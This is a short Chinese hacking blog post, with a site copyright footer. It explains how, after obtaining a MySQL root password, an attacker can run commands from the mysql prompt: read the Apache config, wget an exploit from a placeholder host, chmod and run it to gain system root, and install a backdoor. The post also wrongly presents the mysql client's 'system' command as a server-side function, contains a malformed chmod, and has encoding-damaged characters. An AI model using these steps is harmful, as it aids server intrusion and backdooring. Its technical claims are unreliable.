Author: Sh@dow
剛才在衛(wèi)生間蹲著的時(shí)候忽然想到這個(gè)問(wèn)題，mysql5.x for linux下面有一個(gè)函數(shù)，可以幫助我們干很多事情，這個(gè)函數(shù)4。x下面貌似沒(méi)，原來(lái)一直沒(méi)發(fā)現(xiàn)，也沒(méi)去查函數(shù)手冊(cè)，就我自己的經(jīng)驗(yàn)來(lái)寫點(diǎn)東西。4,x的明天再看看函數(shù)手冊(cè)，再裝一個(gè)實(shí)驗(yàn)一下。mysql 5.x里面引入了一個(gè)system函數(shù)，這個(gè)函數(shù)可以執(zhí)行系統(tǒng)命令，當(dāng)mysql以root登陸的時(shí)候，就可以利用這個(gè)函數(shù)執(zhí)行命令，當(dāng)然是在權(quán)限許可的范圍內(nèi)。
一般我們按照常規(guī)思路，搞到mysql的root密碼之后，我們都會(huì)連接上去，創(chuàng)建一個(gè)表，然后outfile，搞到一個(gè)webshell ,然后提權(quán)如此這般。今天我們換一種方式。
按照上面的方法，我們需要知道web的絕對(duì)路徑，當(dāng)然這個(gè)很不好找，有些有sqlinjection的，可能報(bào)錯(cuò)會(huì)顯示出來(lái)，有的就不一定了。但是按照我的的方法，沒(méi)有必要再去找web路徑了，直接執(zhí)行
mysql>system vi /etc/httpd/conf/httpd.conf;
mysql>system vi /etc/httpd/conf/httpd.conf;
直接這樣就可以找到web的路徑，當(dāng)然，我們的目的并不是找web路徑，放webshell進(jìn)去。我們是要來(lái)做其他的事情，比如，下載exp執(zhí)行，搞到root權(quán)限，然后裝后門蝦米的
mysql>system wget http://xxxx.xxx.com/xxxx
mysql>system chmod x xxxx;
mysql>system ./xxxx;
mysql>system wget http://xxxx.xxx.com/xxxx mysql>system chmod x xxxx;mysql>system ./xxxx;
這樣mysql的root此時(shí)就成為system的root了，剩下的事情，假如開(kāi)了ssh,就ssh上去，輸入mysql的用戶密碼，ok,搞定。
或者，直接提權(quán)之后，下載后門安裝，這個(gè)就留給大家去研究了。

版權(quán)聲明：本站文章來(lái)源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請(qǐng)保持原文完整并注明來(lái)源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來(lái)源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來(lái)，僅供學(xué)習(xí)參考，不代表本站立場(chǎng)，如有內(nèi)容涉嫌侵權(quán)，請(qǐng)聯(lián)系alex-e#qq.com處理。